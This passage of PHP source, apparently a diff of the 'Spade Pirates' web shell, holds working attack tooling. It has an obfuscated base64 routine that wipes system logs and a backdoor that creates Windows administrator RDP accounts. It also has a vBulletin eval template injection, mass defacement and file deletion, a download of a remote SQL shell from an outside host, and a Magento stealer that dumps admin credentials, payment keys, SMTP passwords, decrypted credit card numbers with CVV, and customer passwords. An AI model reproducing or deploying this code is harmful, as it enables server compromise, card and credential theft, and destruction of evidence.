2NhbC9hcGFjaGUvbG9nIik7CgkJCWlmKCEkcm0xMCl7ZWNobyAiPGZvbnQgY29sb3I9cmVkPlVuYWJsZSB0byBEZWxldGUgdGhpcyBMb2chPC9mb250Pjxicj4iO31lbHNleyBlY2hvICI8Zm9udCBjb2xvcj1saW1lPkxvZyBDbGVhciE8L2ZvbnQ+PGJyPiI7fQoJCQkJc2xlZXAoMik7CgkJCSRybTExID0gZXhlKCJybSAtcmYgL3Zhci9ydW4vdXRtcCIpOwoJCQlpZighJHJtMTEpe2VjaG8gIjxmb250IGNvbG9yPXJlZD5VbmFibGUgdG8gRGVsZXRlIHRoaXMgTG9nITwvZm9udD48YnI+Ijt9ZWxzZXsgZWNobyAiPGZvbnQgY29sb3I9bGltZT5Mb2cgQ2xlYXIhPC9mb250Pjxicj4iO30KCQkJCXNsZWVwKDIpOwoJCQkkcm0xMiA9IGV4ZSgicm0gLXJmIC92YXIvbG9ncyIpOwoJCQlpZighJHJtMTIpe2VjaG8gIjxmb250IGNvbG9yPXJlZD5VbmFibGUgdG8gRGVsZXRlIHRoaXMgTG9nITwvZm9udD48YnI+Ijt9ZWxzZXsgZWNobyAiPGZvbnQgY29sb3I9bGltZT5Mb2cgQ2xlYXIhPC9mb250Pjxicj4iO30KCQkJCXNsZWVwKDIpOwoJCQkkcm0xMyA9IGV4ZSgicm0gLXJmIC92YXIvbG9nIik7CgkJCWlmKCEkcm0xMyl7ZWNobyAiPGZvbnQgY29sb3I9cmVkPlVuYWJsZSB0byBEZWxldGUgdGhpcyBMb2chPC9mb250Pjxicj4iO31lbHNleyBlY2hvICI8Zm9udCBjb2xvcj1saW1lPkxvZyBDbGVhciE8L2ZvbnQ+PGJyPiI7fQoJCQkJc2xlZXAoMik7CgkJCSRybTE0ID0gZXhlKCJybSAtcmYgL3Zhci9hZG0iKTsKCQkJaWYoISRybTE0KXtlY2hvICI8Zm9udCBjb2xvcj1yZWQ+VW5hYmxlIHRvIERlbGV0ZSB0aGlzIExvZyE8L2ZvbnQ+PGJyPiI7fWVsc2V7IGVjaG8gIjxmb250IGNvbG9yPWxpbWU+TG9nIENsZWFyITwvZm9udD48YnI+Ijt9CgkJCQlzbGVlcCgyKTsKCQkJJHJtMTUgPSBleGUoInJtIC1yZiAvZXRjL3d0bXAiKTsKCQkJaWYoISRybTE1KXtlY2hvICI8Zm9udCBjb2xvcj1yZWQ+VW5hYmxlIHRvIERlbGV0ZSB0aGlzIExvZyE8L2ZvbnQ+PGJyPiI7fWVsc2V7IGVjaG8gIjxmb250IGNvbG9yPWxpbWU+TG9nIENsZWFyITwvZm9udD48YnI+Ijt9CgkJCQlzbGVlcCgyKTsKCQkJJHJtMTYgPSBleGUoInJtIC1yZiAvZXRjL3V0bXAiKTsKCQkJaWYoISRybTE2KXtlY2hvICI8Zm9udCBjb2xvcj1yZWQ+VW5hYmxlIHRvIERlbGV0ZSB0aGlzIExvZyE8L2ZvbnQ+PGJyPiI7fWVsc2V7IGVjaG8gIjxmb250IGNvbG9yPWxpbWU+TG9nIENsZWFyITwvZm9udD48YnI+Ijt9CgkJCQlzbGVlcCg0KTsKCQkJZWNobyAiU2NyaXB0IFN1Y2Nlc3NmdWxseSBMb2FkZWQhICI7CgkJfQ=="));
- echo "</center>";
- }elseif($_GET['do'] == 'krdp_shell') {
- if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
- if($_POST['create']) {
- $user = htmlspecialchars($_POST['user']);
- $pass = htmlspecialchars($_POST['pass']);
- if(preg_match("/$user/", exe("net user"))) {
- echo "[INFO] -> <font color=red>user <font color=lime>$user</font> Available Already</font>";
- } else {
- $add_user = exe("net user $user $pass /add");
- $add_groups1 = exe("net localgroup Administrators $user /add");
- $add_groups2 = exe("net localgroup Administrator $user /add");
- $add_groups3 = exe("net localgroup Administrateur $user /add");
- echo "[ RDP ACCOUNT INFO ]<br>
- ------------------------------<br>
- IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font><br>
- Username: <font color=lime>$user</font><br>
- Password: <font color=lime>$pass</font><br>
- ------------------------------<br><br>
- [ STATUS ]<br>
- ------------------------------<br>
- ";
- if($add_user) {
- echo "[add user] -> <font color='lime'>Success!</font><br>";
- } else {
- echo "[add user] -> <font color='red'>Error!</font><br>";
- }
- if($add_groups1) {
- echo "[add localgroup Administrators] -> <font color='lime'>Success!</font><br>";
- } elseif($add_groups2) {
- echo "[add localgroup Administrator] -> <font color='lime'>Success!</font><br>";
- } elseif($add_groups3) {
- echo "[add localgroup Administrateur] -> <font color='lime'>Success!</font><br>";
- } else {
- echo "[add localgroup] -> <font color='red'>Error!</font><br>";
- }
- echo "------------------------------<br>";
- }
- } elseif($_POST['s_opsi']) {
- $user = htmlspecialchars($_POST['r_user']);
- if($_POST['opsi'] == '1') {
- $cek = exe("net user $user");
- echo "Checking username <font color=lime>$user</font> ....... ";
- if(preg_match("/$user/", $cek)) {
- echo "[ <font color=lime>Available Already!</font> ]<br>
- ------------------------------<br><br>
- <pre>$cek</pre>";
- } else {
- echo "[ <font color=red>Not Available!</font> ]";
- }
- } elseif($_POST['opsi'] == '2') {
- $cek = exe("net user $user spadepirates");
- if(preg_match("/$user/", exe("net user"))) {
- echo "[change password: <font color=lime>spadepirates</font>] -> ";
- if($cek) {
- echo "<font color=lime>Success!</font>";
- } else {
- echo "<font color=red>Error!</font>";
- }
- } else {
- echo "[INFO] -> <font color=red>user <font color=lime>$user</font> Not Available!</font>";
- }
- } elseif($_POST['opsi'] == '3') {
- $cek = exe("net user $user /DELETE");
- if(preg_match("/$user/", exe("net user"))) {
- echo "[remove user: <font color=lime>$user</font>] -> ";
- if($cek) {
- echo "<font color=lime>Success!</font>";
- } else {
- echo "<font color=red>Error!</font>";
- }
- } else {
- echo "[INFO] -> <font color=red>user <font color=lime>$user</font> Not Available!</font>";
- }
- } else {
- //
- }
- } else {
- echo "<center><h1 class='titulo'>Create RDP</h1><br>
- <form method='post'>
- <input type='text' name='user' placeholder='username' value='spadeppirates' required>
- <input type='text' name='pass' placeholder='password' value='spadepirates' required>
- <input type='submit' name='create' value='>>'>
- </form>
- -- Option --<br>
- <form method='post'>
- <input type='text' name='r_user' placeholder='username' required>
- <select name='opsi'>
- <option value='1'>Check Username</option>
- <option value='2'>Change Password</option>
- <option value='3'>Clear Username</option>
- </select>
- <input type='submit' name='s_opsi' value='>>'>
- </form></center>";
- }
- } else {
- echo "<font color=red>This feature can only be used in Windows Server.</font>";
- }
- } elseif ($_GET['do'] == 'vb') { {
- echo ' <center><h1 class="titulo">VB INDEX CHANGER</h1></center><br>
- <form action method="post"><div align="center">
- <H2><span style="font-weight: 400"><font face="Trebuchet MS" size="4">
- </div><br>
- ';
- if (empty($_POST['index'])) {
- echo "<center><FORM method=POST>";
- echo "<table class=tabnet>
- <th colspan=2>Vb Index Changer</th>
- <tr><td>host </td><td><input class=inputz type=text size=60 name=localhost value=localhost></td></tr>
- <tr><td>database </td><td><input class=inputz type=text size=60 name=database value=forum_vb></td></tr>
- <tr><td>username </td><td><input class=inputz type=text size=60 name=username value=user_vb></td></tr>
- <tr><td>password </td><td><input class=inputz type=text size=60 name=password value=vb></td></tr>
- </tr>
- <th colspan=2>Your Index Code</th></table><table class=tabnet>
- <TEXTAREA name=index rows=13 style='width: 450px; height: 200px;' border=1 cols=69 name=code>Your Index Code Here...</TEXTAREA><br>
- <INPUT class=inputzbut type=submit value=setting name=send>
- </FORM></table></center>";
- } else {
- $localhost = $_POST['localhost'];
- $database = $_POST['database'];
- $username = $_POST['username'];
- $password = $_POST['password'];
- $index = $_POST['index'];
- @mysql_connect($localhost, $username, $password) or die(mysql_error());
- @mysql_select_db($database) or die(mysql_error());
- $index = str_replace("'", "'", $index);
- $set_index = "{${eval(base64_decode('";
- $set_index .= base64_encode("echo "$index";");
- $set_index .= "')) }}{${exit() }}</textarea>";
- echo ("SET template ='" . $set_index . "' ");
- $ok = @mysql_query("SET template ='" . $set_index . "'") or die(mysql_error());
- if ($ok) {echo "Update success...<br>";}
- }
- }
- } elseif ($_GET['do'] == 'whois') {
- @set_time_limit(0);
- @error_reporting(0);
- function sws_domain_info($site) {
- $getip = @file_get_contents("http://networktools.nl/whois/" . $site);
- flush();
- $ip = @findit($getip, '<pre>', '</pre>');
- return $ip;
- flush();
- }
- function sws_net_info($site) {
- $getip = @file_get_contents("http://networktools.nl/asinfo/" .$site);
- $ip = @findit($getip, '<pre>', '</pre>');
- return $ip;
- flush();
- }
- function sws_site_ser($site) {
- $getip = @file_get_contents("http://networktools.nl/reverseip/" .$site);
- $ip = @findit($getip, '<pre>', '</pre>');
- return $ip;
- flush();
- }
- function sws_sup_dom($site) {
- $getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=" . $site . "&Search+subdomains=Find+subdomains");
- $ip = @findit($getip, '<strong>Nameservers found:</strong>', '<script type="text/javascript">');
- return $ip;
- flush();
- }
- function sws_port_scan($ip) {
- $list_post = array('80', '21', '22', '2082', '25', '53', '110', '443', '143');
- foreach ($list_post as $o_port) {
- $connect = @fsockopen($ip, $o_port, $errno, $errstr, 5);
- if ($connect) {
- echo ''.$ip.':~$ ' . $o_port . ' ??? <u style="color: white">Open</u> <br /><br />';
- flush();
- }
- }
- }
- function findit($mytext, $starttag, $endtag) {
- $posLeft = @stripos($mytext, $starttag) + strlen($starttag);
- $posRight = @stripos($mytext, $endtag, $posLeft + 1);
- return @substr($mytext, $posLeft, $posRight - $posLeft);
- flush();
- }
- echo '<center><h1 class="titulo">WHOIS</h1>';
- echo '<br />
- <div class="sc"><form method="post"><table>
- <tr><th colspan="5" style="border: 2px lime dotted;">Whois Site</th></tr>
- <tr><td>Site to scan </td><td>:</td><td><input type="text" name="site" size="50" style="color:white;" class="inputz" value="site.com" />   <input class="inputzbut" type="submit" style="color:white;background-color:#000000" name="scan" value="Scan !" /></td></tr>
- </table></form></div>';
- if (isset($_POST['scan'])) {
- $site = @htmlentities($_POST['site']);
- if (empty($site)) {
- die('<br /><br /> Not add IP .. !');
- }
- $ip_port = @gethostbyname($site);
- echo "<br /><div class='sc2'>Scanning [ $site ip $ip_port ] ... </div>
- <div class='tit'> <br /><br />|-------------- Port Server ------------------| <br /></div>
- <div class='ru'> <br /><br /><pre>";
- echo "~" . sws_port_scan($ip_port) . " </pre></div> ";
- flush();
- echo '<div class="tit"><br /><br />|-------------- Domain Info ------------------| <br /> </div>
- <div class="ru">
- <pre>' . sws_domain_info($site) . '</pre></div>';
- flush();
- echo '<div class="tit"> <br /><br />|-------------- Network Info ------------------| <br /></div>
- <div class="ru">
- <pre>'.sws_net_info($site).'</pre> </div>';
- flush();
- echo '<div class="tit"> <br /><br />|-------------- subdomains Server ------------------| <br /></div>
- <div class="ru">
- <pre>'.sws_sup_dom($site).'</pre> </div>';
- flush();
- echo '<div class="tit"> <br /><br />|-------------- Site Server ------------------| <br /></div>
- <div class="ru">
- <pre>'.sws_site_ser($site).'</pre> </div>
- <div class="tit"> <br /><br />|-------------- END ------------------| <br /></div>';
- flush();
- }
- echo '</center>';
- } elseif($_GET['do'] == 'mass_deface') {
- echo "<center><h1 class='titulo'>MASS DEFACE</h1><br><form action=\"\" method=\"post\">\n";
- $dirr=$_POST['d_dir'];
- $index = $_POST["script"];
- $index = str_replace('"',"'",$index);
- $index = stripslashes($index);
- function edit_file($file,$index){
- if (is_writable($file)) {
- clear_fill($file,$index);
- echo "<Span style='color:green;'><strong> [+] Mass Deface 100% Successfull </strong></span><br></center>";
- }
- else {
- echo "<Span style='color:red;'><strong> [-] Mass Deface Failed :( </strong></span><br></center>";
- }
- }
- function hapus_massal($dir,$namafile) {
- if(is_writable($dir)) {
- $dira = scandir($dir);
- foreach($dira as $dirb) {
- $dirc = "$dir/$dirb";
- $lokasi = $dirc.'/'.$namafile;
- if($dirb === '.') {
- if(file_exists("$dir/$namafile")) {
- unlink("$dir/$namafile");
- }
- } elseif($dirb === '..') {
- if(file_exists("".dirname($dir)."/$namafile")) {
- unlink("".dirname($dir)."/$namafile");
- }
- } else {
- if(is_dir($dirc)) {
- if(is_writable($dirc)) {
- if(file_exists($lokasi)) {
- echo "[<font color=lime>DELETED</font>] $lokasi<br>";
- unlink($lokasi);
- $idx = hapus_massal($dirc,$namafile);
- }
- }
- }
- }
- }
- }
- }
- function clear_fill($file,$index){
- if(file_exists($file)){
- $handle = fopen($file,'w');
- fwrite($handle,'');
- fwrite($handle,$index);
- fclose($handle); } }
- function gass(){
- global $dirr , $index ;
- chdir($dirr);
- $me = str_replace(dirname(__FILE__).'/','',__FILE__);
- $files = scandir($dirr) ;
- $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
- sort($files);
- $n = 0 ;
- foreach ($files as $file){
- if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
- echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
- edit_file($file,$index);
- flush();
- $n = $n +1 ;
- }
- }
- echo "<br>";
- echo "<center><br><h3>$n Kali Anda Telah Ngecrot Disini </h3></center><br>";
- }
- function ListFiles($dirrall) {
- if($dh = opendir($dirrall)) {
- $files = Array();
- $inner_files = Array();
- $me = str_replace(dirname(__FILE__).'/','',__FILE__);
- $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
- while($file = readdir($dh)) {
- if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
- if(is_dir($dirrall . "/" . $file)) {
- $inner_files = ListFiles($dirrall . "/" . $file);
- if(is_array($inner_files)) $files = array_merge($files, $inner_files);
- } else {
- array_push($files, $dirrall . "/" . $file);
- }
- }
- }
- closedir($dh);
- return $files;
- }
- }
- function gass_all(){
- global $index ;
- $dirrall=$_POST['d_dir'];
- foreach (ListFiles($dirrall) as $key=>$file){
- $file = str_replace('//',"/",$file);
- echo "<center><strong>$file</strong> ===>";
- edit_file($file,$index);
- flush();
- }
- $key = $key+1;
- echo "<center><br><h3>$key Kali Anda Telah Ngecrot Disini </h3></center><br>"; }
- function sabun_massal($dir,$namafile,$isi_script) {
- if(is_writable($dir)) {
- $dira = scandir($dir);
- foreach($dira as $dirb) {
- $dirc = "$dir/$dirb";
- $lokasi = $dirc.'/'.$namafile;
- if($dirb === '.') {
- file_put_contents($lokasi, $isi_script);
- } elseif($dirb === '..') {
- file_put_contents($lokasi, $isi_script);
- } else {
- if(is_dir($dirc)) {
- if(is_writable($dirc)) {
- echo "[<font color=lime>DONE</font>] $lokasi<br>";
- file_put_contents($lokasi, $isi_script);
- $idx = sabun_massal($dirc,$namafile,$isi_script);
- }
- }
- }
- }
- }
- }
- if($_POST['mass'] == 'onedir') {
- echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
- $ini="http://";
- $mainpath=$_POST[d_dir];
- $file=$_POST[d_file];
- $dir=opendir("$mainpath");
- $code=base64_encode($_POST[script]);
- $indx=base64_decode($code);
- while($row=readdir($dir)){
- $start=@fopen("$row/$file","w+");
- $finish=@fwrite($start,$indx);
- if ($finish){
- echo"$ini$row/$file\n";
- }
- }
- echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
- $mainpath=$_POST[d_dir];$file=$_POST[d_file];
- $dir=opendir("$mainpath");
- $code=base64_encode($_POST[script]);
- $indx=base64_decode($code);
- while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
- $finish=@fwrite($start,$indx);
- if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
- }
- }
- elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
- elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
- elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
- elseif($_POST['mass'] == 'massdeface') {
- echo "<div style='margin: 5px auto; padding: 5px'>";
- sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
- echo "</div>"; }
- else {
- echo "
- <center><font style='text-decoration: underline;'>
- Select Type:<br>
- </font>
- <select class=\"select\" name=\"mass\" style=\"width: 450px;\" height=\"10\">
- <option value=\"onedir\">Mass Deface 1 Dir</option>
- <option value=\"massdeface\">Mass Deface ALL Dir</option>
- <option value=\"sabunkabeh\">Mass Deface Temp</option>
- <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
- <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
- <font style='text-decoration: underline;'>Folder:</font><br>
- <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
- <font style='text-decoration: underline;'>Filename:</font><br>
- <input type='text' name='d_file' value='spadepirates.php' style='width: 450px;' height='10'><br>
- <font style='text-decoration: underline;'>Index File:</font><br>
- <textarea name='script' style='width: 450px; height: 200px;'>Hacked By Spade</textarea><br>
- <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
- </form></center>";
- }
- }elseif($_GET['do'] == 'dbsql'){
- echo "<center><br/><h1 class='titulo'>MYSQL DATABASE SHELL</h1><br>";
- if(!file_exists('spade_sqlshell/sqlbuddy/index.php')){ $dizin = 'http://r00t.info/shell-dosyalar/sqlbuddy.zip';
- function dosya_indir($link,$name=null) { $link_info = pathinfo($link);
- $uzanti = strtolower($link_info['extension']);
- $file = ($name) ? $name.'.'.$uzanti : $link_info['basename'];
- $curl = curl_init($link);
- $fopen = fopen($file,'w');
- curl_setopt($curl, CURLOPT_HEADER,0);
- curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);
- curl_setopt($curl, CURLOPT_FILE, $fopen);
- curl_exec($curl);
- curl_close($curl);
- fclose($fopen);
- } dosya_indir($dizin, "sqlbuddy");
- $zip = new ZipArchive();
- $file = 'sqlbuddy.zip';
- $zip->open($file);
- $cikar = $zip->extractTo('spade_sqlshell/');
- if(file_exists('sqlbuddy.zip')){ @unlink('sqlbuddy.zip');
- } if($cikar){ echo "<iframe src=spade_sqlshell/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";
- } else{ echo '<font color=red>Cant Execute SQL Shell!</font>';
- } } elseif(file_exists('spade_sqlshell/sqlbuddy/index.php')){ echo "<iframe src=spade_sqlshell/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";
- }
- }elseif($_GET['do'] == 'magen') {
- echo'
- <div id="page-wrap">
- <center>
- <br>
- <FORM action="" method="post">
- <h1 class="titulo">MAGENTO INFO STEALER</h1><br>
- <input type="hidden" name="form_action" value="2">
- </div>
- </div>
- ';
- if(file_exists($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml')){
- $xml = simplexml_load_file($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml');
- if(isset($xml->global->resources->default_setup->connection)) {
- $connection = $xml->global->resources->default_setup->connection;
- $prefix = $xml->global->resources->db->table_prefix;
- $key = $xml->global->crypt->key; //f8cd1881e3bf20108d5f4947e60acfc1
- require_once $_SERVER['DOCUMENT_ROOT'].'/app/Mage.php';
- try {
- $app = Mage::app('default');
- Mage::getSingleton('core/session', array('name'=>'frontend'));
- }catch(Exception $e) { echo 'Message: ' .$e->getMessage()."<br/>\n";}
- if (!mysql_connect($connection->host, $connection->username, $connection->password)){
- print("Could not connect: " . mysql_error());
- }
- mysql_select_db($connection->dbname);
- echo $connection->host."|".$connection->username."|".$connection->password."|".$connection->dbname."| $prefix | $key<br/>\n";
- $crypto = new Varien_Crypt_Mcrypt();
- $crypto->init($key);
- //=========================================================================================================
- $query = mysql_query("SELECT user_id,firstname,lastname,email,username,password FROM admin_user where is_active = '1'");
- if (!$query){
- echo "<center><b>Gagal</b></center>";
- }else{
- $site = mysql_fetch_array(mysql_query("SELECT value as website FROM core_config_data WHERE path='web/unsecure/base_url'"));
- echo'<br><br>
- ====================================================================<br>
- [ Admin FROM website : '.$site['website'].'] <br>
- ====================================================================<br>';
- }
- echo "
- <table border='1' align='center' >
- <tr>
- <td>id</td>
- <td>firstname</td>
- <td>lastname</td>
- <td>email</td>
- <td>username</td>
- <td>password</td>
- </tr>";
- while($vx = mysql_fetch_array($query)) {
- $no = 1;
- $user_id = $vx['user_id'];
- $username = $vx['username'];
- $password = $vx['password'];
- $email = $vx['email'];
- $firstname = $vx['firstname'];
- $lastname = $vx['lastname'];
- echo "<tr><pre><td>$user_id</td><td>$firstname</td><td>$lastname</td><td>$email</td><td>$username</td><td>$password</td></pre></tr>";
- }
- echo "</table><br>";
- //=========================================================================================================
- $query = mysql_query("SELECT value as user,(SELECT value FROM core_config_data where path = 'payment/authorizenet/trans_key') as pass FROM core_config_data where path = 'payment/authorizenet/login'");
- if(mysql_num_rows($query) != 0){
- if (!$query){
- echo "<center><b>Gagal</b></center>";
- }else{
- echo'<br><br>
- ====================================================================<br>
- [ Authorizenet ] <br>
- ====================================================================<br>';
- }
- echo "
- <table border='1' align='center' >
- <tr>
- <td>no</td>
- <td>user</td>
- <td>pass</td>
- </tr>";
- $no = 1;
- while($vx = mysql_fetch_array($query)) {
- $user = $crypto->decrypt($vx['user']);
- $pass = $crypto->decrypt($vx['pass']);
- echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";
- $no++;
- }
- echo "</table><br>";
- }
- //=========================================================================================================
- $query_smtp = mysql_query("SELECT (SELECT a.value FROM core_config_data as a WHERE path = 'system/smtpsettings/host') as host , (SELECT b.value FROM core_config_data as b WHERE path = 'system/smtpsettings/port') as port,(SELECT c.value FROM core_config_data as c WHERE path = 'system/smtpsettings/username') as user ,(SELECT d.value FROM core_config_data as d WHERE path = 'system/smtpsettings/password') as pass FROM core_config_data limit 1,1");
- if(mysql_num_rows($query_smtp) != 0){
- if (!$query_smtp){
- echo "<center><b>Gagal</b></center>";
- }else{
- echo'<br><br>
- ====================================================================<br>
- [ SMTP ] <br>
- ====================================================================<br>';
- }
- echo "
- <table border='1' align='center' >
- <tr>
- <td>no</td>
- <td>host</td>
- <td>port</td>
- <td>user</td>
- <td>pass</td>
- </tr>";
- $no = 1;
- $batas = 0;
- while($rows = mysql_fetch_array($query_smtp)) {
- $smtphost = $rows[0];
- $smtpport = $rows[1];
- $smtpuser = $rows[2];
- $smtppass = $rows[3];
- echo "<tr><pre><td>$no</td><td>$smtphost</td><td>$smtpport</td><td>$smtpuser</td><td>$smtppass</td></pre></tr>";
- $no++;
- }
- echo "</table><br>";
- }
- //=========================================================================================================
- $query = mysql_query("SELECT sfo.updated_at,sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_enc,CONCAT(sfo.cc_exp_month,' |',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' |-| ',billing.email) AS 'Billing Address' FROM sales_flat_quote_payment AS sfo JOIN sales_flat_quote_address AS billing ON billing.quote_id = sfo.quote_id AND billing.address_type = 'billing'");
- $query2 = mysql_query("SELECT sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_status,CONCAT(sfo.cc_exp_month,'|',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' | ',billing.email) AS 'Billing Address' FROM sales_flat_order_payment AS sfo JOIN sales_flat_order_address AS billing ON billing.parent_id = sfo.parent_id AND billing.address_type = 'billing' where cc_number_enc != ''");
- if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0){
- echo'<br><br>
- ====================================================================<br>
- [ Credit Card ] <br>
- ====================================================================<br>';
- echo "
- <table border='1' align='left' >
- <tr>
- <td>no</td>
- <td>Date</td>
- <td>Credit Owner</td>
- <td>method</td>
- <td>Credit Number</td>
- <td>Credit Exp</td>
- <td>CVV</td>
- <td>Address</td>
- </tr>";
- $no = 1;
- $batas = 0;
- while($vx = mysql_fetch_array($query)){
- $date = $vx['updated_at'];
- $cc_owner = $vx['cc_owner'];
- $method = $vx['method'];
- $cc_number_enc = $crypto->decrypt($vx['cc_number_enc']);
- $exp = $vx['exp'];
- $cc_cid_enc = $crypto->decrypt($vx['cc_cid_enc']);
- $Billing_Address = $vx['Billing Address'];
- echo "<tr><pre><td>$no</td><td>$date</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_enc</td><td>$Billing_Address</td></pre></tr>";
- $batas = $no++;
- }
- while($vx2 = mysql_fetch_array($query2)){
- $batas +=1;
- $cc_owner = $vx2['cc_owner'];
- $method = $vx2['method'];
- $cc_number_enc = $crypto->decrypt($vx2['cc_number_enc']);
- $exp = $vx2['exp'];
- $cc_cid_status = $crypto->decrypt($vx2['cc_cid_status']);
- $Billing_Address = $vx2['Billing Address'];
- echo "<tr><pre><td>$batas</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_status</td><td>$Billing_Address</td></pre></tr>";
- $batas++;
- }
- echo "</table><br>";
- }
- //=========================================================================================================
- $query = mysql_query("SELECT email,value FROM customer_entity_varchar, customer_entity WHERE customer_entity_varchar.entity_id = customer_entity.entity_id and attribute_id=12");
- $query2 = mysql_query("SELECT customer_email,password_hash FROM sales_flat_quote");
- if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0 ){
- if (!$query){
- echo "<center><b>Gagal</b></center>";
- }else{
- echo'<br><br>
- ====================================================================<br>
- [ Customer ] <br>
- ====================================================================<br>';
- }
- echo "
- <table border='1' align='center' >
- <tr>
- <td>no</td>
- <td>user</td>
- <td>pass</td>
- </tr>";
- $no = 1;
- $batas = 0;
- while($vx = mysql_fetch_array($query)) {
- $user = $vx['email'];
- $pass = $vx['value'];
- echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";
- $batas = $no++;
- }
- if(mysql_num_rows($query2) != 0 && ($query2)){
- while($vx2 = mysql_fetch_array($query2)){
- $user = $vx2['customer_email'];
- $pass = $crypto->decrypt($vx2['password_hash']);
- if(!empty($user) && !empty($pass)){ //tampilin ketika datanya itu ada klo gk ada ya jangan di tampiin
- $batas +=1;
- echo "<tr><pre><td>$batas</td><td>$user</td><td>$pass</td></pre></tr>";
- $batas++;
- }
- }
- }
- echo "</table><br>";
- }
- //=========================================================================================================
- }
- }
- function save($format,$data){
- $fp = fopen($format, 'a');
- fwrite($fp, $data);
- fclose($fp);
- }
- function cekbase64($string){
- $decoded = base64_decode($string, true);
- if (!preg_match('/^[a-zA-Z0-9\/\r\n+]*={0,2}$/', $string)) return false;
- if(!base64_decode($string, true)) return false;
- if(base64_encode($decoded) != $string) return false;
- return true;//nilai return 1 jika true
- }
- //----untuk decode password ---/
- class Varien_Crypt_Mcrypt{
- /**
- * Constuctor
- *
- * @param array $data
- */
- public function __construct()
- {
- }
- /**
- * Initialize mcrypt module
- *
- * @param string $key cipher private key
- * @return Varien_Crypt_Mcrypt
- */
- public function init($key)
- {
- $this->handler = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, '');
- $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($this->handler), MCRYPT_RAND);
- $maxKeySize = mcrypt_enc_get_key_size($this->handler);
- if (iconv_strlen($key, 'UTF-8')>$maxKeySize) {
- //throw new Varien_Exception('Maximum key size must should be smaller '.$maxKeySize);
- return null;
- }
- mcrypt_generic_init($this->handler, $key, $iv);
- return $this;
- }
- /**
- * Encrypt data
- *
- * @param string $data source string
- * @return string
- */
- public function encrypt($data)
- {
- if (!$this->handler) {
- //throw new Varien_Exception('Crypt module is not initialized.');
- return null;
- }
- if (strlen($data) == 0) {
- return $data;
- }
- return base64_encode(mcrypt_generic($this->handler, $data));
- }
- /**
- * Decrypt data
- *
- * @param string $data encrypted string
- * @return string
- */
- public function decrypt($data)
- {
- if (!$this->handler) {
- //throw new Varien_Exception('Crypt module is not initialized.');
- return null;
- }
- if (strlen($data) == 0) {
- return $data;
- }
- return mdecrypt_generic($this->handler, base64_decode($data));
- }
- /**
- * Desctruct cipher module
- *
- */
- public function __destruct()
- {
- if ($this->handler) {
- $this->_reset();
- }
- }
- protected function _reset()
- {
- mcrypt_generic_deinit($this->handler);
- mcrypt_module_close($this->handler);
- }
- }
- }elseif($_GET['do'] == 'zip') {
- echo "<center><h1 class='titulo'>ZIP MENU</h1>";
- function rmdir_recursive($dir) {
- foreach(scandir($dir) as $file) {
- if ('.' === $file || '..' === $file) continue;
- if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file");
- else unlink("$dir/$file");
- }
- rmdir($dir);
- }
- if($_FILES["zip_file"]["name"]) {
- $filename = $_FILES["zip_file"]["name"];
- $source = $_FILES["zip_file"]["tmp_name"];
- $type = $_FILES["zip_file"]["type"];
- $name = explode(".", $filename);
- $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed');
- foreach($accepted_types as $mime_type) {
- if($mime_type == $type) {
- $okay = true;
- break;
- }
- }
- $continue = strtolower($name[1]) == 'zip' ? true : false;
- if(!$continue) {
